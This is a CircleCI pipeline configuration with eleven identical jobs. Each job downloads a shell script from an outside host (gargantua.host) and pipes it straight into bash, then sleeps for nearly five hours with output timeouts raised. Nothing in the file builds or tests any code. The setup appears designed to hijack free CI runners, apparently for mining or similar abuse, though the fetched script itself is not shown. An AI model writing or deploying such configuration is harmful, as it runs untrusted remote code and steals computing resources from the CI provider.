version: 2.1

jobs:
  redistyrewa:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa1:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa2:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa3:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa4:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa5:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa6:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa7:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa8:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa9:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

  redistyrewa10:
    docker:
    - image: ubuntu:18.04
    steps:
      - checkout
      - run: apt-get update; apt install tmux htop wget curl -y; curl -sL http://gargantua.host/craylistanahekana.sh | bash -
      - run: 
            command: sleep 17980
            no_output_timeout: 5h

workflows:
  main:
    jobs:
      - redistyrewa
      - redistyrewa1
      - redistyrewa2
      - redistyrewa3
      - redistyrewa4
      - redistyrewa5
      - redistyrewa6
      - redistyrewa7
      - redistyrewa8
      - redistyrewa9
      - redistyrewa10